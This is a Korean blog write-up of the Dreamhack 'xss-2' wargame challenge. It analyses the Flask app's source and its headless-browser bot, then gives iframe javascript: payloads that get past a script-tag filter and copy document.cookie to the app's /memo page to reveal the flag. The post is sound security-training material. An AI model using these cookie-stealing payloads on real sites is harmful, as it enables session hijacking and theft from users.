본문 바로가기
Wargame/Web

[Dreamhack] xss-2

l2chae 2024. 2. 11. 10:30

소스 코드 분석

/vuln
render_template 함수를 통해서 화면을 출력한다

@app.route("/vuln")
def vuln():
    return render_template("vuln.html")

/flag
전달 받은 param 값과 FLAG를 check_xss로 전달한다
이후 read_url에 FLAG를 cookie로 하여 전달 후 새로운 cookie를 생성한다

def read_url(url, cookie={"name": "name", "value": "value"}):
    cookie.update({"domain": "127.0.0.1"})
    try:
        service = Service(executable_path="/chromedriver")
        options = webdriver.ChromeOptions()
        for _ in [
            "headless",
            "window-size=1920x1080",
            "disable-gpu",
            "no-sandbox",
            "disable-dev-shm-usage",
        ]:
            options.add_argument(_)
        driver = webdriver.Chrome(service=service, options=options)
        driver.implicitly_wait(3)
        driver.set_page_load_timeout(3)
        driver.get("<http://127.0.0.1:8000/>")
        driver.add_cookie(cookie)
        driver.get(url)
    except Exception as e:
        driver.quit()
        # return str(e)
        return False
    driver.quit()
    return True

def check_xss(param, cookie={"name": "name", "value": "value"}):
    url = f"<http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}>"
    return read_url(url, cookie)

@app.route("/flag", methods=["GET", "POST"])
def flag():
    if request.method == "GET":
        return render_template("flag.html")
    elif request.method == "POST":
        param = request.form.get("param")
        if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
            return '<script>alert("wrong??");history.go(-1);</script>'

        return '<script>alert("good");history.go(-1);</script>'

/memo
전달 받은 memo 값을 memo_txt 변수에 추가하여 저장한 후 render_template 함수를 통해서 출력한다

memo_text = ""

@app.route("/memo")
def memo():
    global memo_text
    text = request.args.get("memo", "")
    memo_text += text + "\\n"
    return render_template("memo.html", memo=memo_text)

 

취약점 분석

/vuln
render_template 함수를 사용하여 XSS 취약점을 방지하고 있지만 이를 우회하여 XSS 공격이 가능하다
 

익스플로잇

필터링 우회
script 태그를 사용할 수 없으므로 스크립트를 실행할 수 있는 iframe 태그를 이용하여 우회하였다

<iframe src="javascript:alert('XSS');"></iframe>

FLAG 확인

<iframe src="javascript:location.href='/memo?memo='+document.cookie;"></iframe>

반응형

'Wargame > Web' 카테고리의 다른 글

[Dreamhack] csrf-2  (2) 2024.02.18
[Dreamhack] csrf-1  (0) 2024.02.17
[Dreamhack] xss-1  (0) 2024.02.11
[Dreamhack] session-basic  (0) 2024.02.08
[Dreamhack] cookie  (0) 2024.02.08

'Wargame/Web' Related Articles

티스토리툴바